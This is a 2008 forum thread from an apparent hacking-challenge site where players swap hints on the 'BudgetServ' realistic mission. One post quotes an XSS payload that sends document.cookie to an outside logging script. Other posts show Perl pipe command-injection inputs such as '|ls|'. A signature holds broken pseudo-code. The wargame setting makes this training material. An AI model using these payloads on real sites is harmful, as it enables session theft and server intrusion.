Please ask questions ONLY in this topic.

Re: BudgetSERV

Post by fabulous on Wed Jun 18, 2008 11:27 pm
([msg=5236]see Re: BudgetSERV[/msg])

thanks i finished it and it was a lot of fun. i didn't use the user agent though. was it really needed for the mission?
fabulous
New User
New User
 
Posts: 2
Joined: Tue Jun 17, 2008 5:27 pm
Blog: View Blog (0)


Re: BudgetSERV

Post by pitagora on Thu Jun 19, 2008 3:51 am
([msg=5252]see Re: BudgetSERV[/msg])

fabulous wrote:thanks i finished it and it was a lot of fun. i didn't use the user agent though. was it really needed for the mission?

yes. I don't think there was another way...I am curios though what short cuts did you take to avoid stealing the session in the first place. Drop me a pm please.
pitagora
New User
New User
 
Posts: 8
Joined: Tue Jun 17, 2008 10:41 am
Blog: View Blog (0)


Re: BudgetSERV

Post by Nines on Thu Jun 19, 2008 7:21 am
([msg=5262]see Re: BudgetSERV[/msg])

Stealing the cookie *isn't* necessary in this mission. I just included it in the article as an extra, since you'd probably do that in a real situation.. I think this mission was changed at some point so that it's no longer necessary. Make sure you aren't logged in before continuing with the mission.
User avatar
Nines
Poster
Poster
 
Posts: 191
Joined: Sun Apr 13, 2008 5:57 pm
Blog: View Blog (0)


Re: BudgetSERV

Post by brokenbylaw on Thu Jul 03, 2008 9:57 pm
([msg=6511]see Re: BudgetSERV[/msg])

Ok I dont know what to do i got into the "therightwayradio" acount page i just don't know how to rephrase that what to do lol i used
Code: Select all
javascript:void(document.location="http://www.the-point.110MB.com/stealer/getlog.php?cookie=" +document.cookie);
i looked through the cookies but didn't get anything interesting i tryed everything that you guys gave PLEASE help :oops: :?:


Hack Everything
Code: Select all
function check()
{
return="data incorrect please reload server";
}
function checkvalid(body)
<?php
foopen("load.txt")
?>
<body onload="checkvalid">

brokenbylaw
New User
New User
 
Posts: 2
Joined: Thu May 22, 2008 7:54 pm
Blog: View Blog (0)


Re: BudgetSERV

Post by Damascus2k8 on Tue Jul 08, 2008 11:00 pm
([msg=6923]see Re: BudgetSERV[/msg])

Ok, you're thinking along the right direction, but take another look at the main page (the rightwayradio one) it says its logging stuff, and even gives you a demonstration, take a look at that and notice what it is logging, and what type of file is that log saved to? Maybe there is another way for you to run that code.....

*Hint* Firefox has an addon that can easily let you modify what gets logged here!


C0362AF19B89E861F21485CE1D2B430E



"Change your thoughts and you change your world!"
Damascus2k8
Experienced User
Experienced User
 
Posts: 68
Joined: Mon Apr 14, 2008 8:18 pm
Location: /root
Blog: View Blog (0)


Need help with perl piping!

Post by BlowMagnum on Fri Jul 18, 2008 5:09 pm
([msg=7734]see Need help with perl piping![/msg])

Ok, so i tried searching google for perl piping and i found something like this:

something = |/dir/

So I tried doing something like this :
realistic/11/page.pl?page=; |pages;

I have tried opendir(''dir"); but it doesn't work either.

Am I on the right way?
Maybe the syntax is wrong?
Help!

P.S Sory for my bad English - Im from Latvia but I guess that 90% of people don't even know where that is.
BlowMagnum
New User
New User
 
Posts: 18
Joined: Sun May 18, 2008 5:18 am
Blog: View Blog (0)


Access is denied

Post by agentderek on Mon Jul 21, 2008 12:01 am
([msg=7918]see Access is denied[/msg])

I was able to find all the login information to the administrative edit page. I tried editing the download page to download the src.tar.gz but when I try this, I get an access is denied error.

Does anyone have a hint to help me get access...
agentderek
New User
New User
 
Posts: 6
Joined: Sun Jul 20, 2008 1:08 am
Blog: View Blog (0)


Re: Need help with perl piping!

Post by agentderek on Mon Jul 21, 2008 12:04 am
([msg=7919]see Re: Need help with perl piping![/msg])

You are on the right track, but your syntax is wrong. There is a unix command that you can use that will list the files in the directory.

If you solved basic 8 and 9 then try to remember what you did to solve those.
agentderek
New User
New User
 
Posts: 6
Joined: Sun Jul 20, 2008 1:08 am
Blog: View Blog (0)


Re: Need help with perl piping!

Post by BlowMagnum on Mon Jul 21, 2008 1:02 pm
([msg=7949]see Re: Need help with perl piping![/msg])

agentderek wrote:You are on the right track, but your syntax is wrong. There is a unix command that you can use that will list the files in the directory.

If you solved basic 8 and 9 then try to remember what you did to solve those.

Yes I have solved the basics...

Do I have to combine the unix command with perl pipe?
Something like this - realistic/11/page.pl?page=ls|pages ?
Maybe the "ls" command needs some extra parameters? (-a -d -F e.t.c)

Help!
BlowMagnum
New User
New User
 
Posts: 18
Joined: Sun May 18, 2008 5:18 am
Blog: View Blog (0)


Re: Need help with perl piping!

Post by agentderek on Mon Jul 21, 2008 11:38 pm
([msg=7976]see Re: Need help with perl piping![/msg])

You almost have it correct...|ls| is the only command you need...no extra parameters
agentderek
New User
New User
 
Posts: 6
Joined: Sun Jul 20, 2008 1:08 am
Blog: View Blog (0)


PreviousNext

Return to (Real 11) BudgetServ Web Hosting

Who is online

Users browsing this forum: No registered users and 0 guests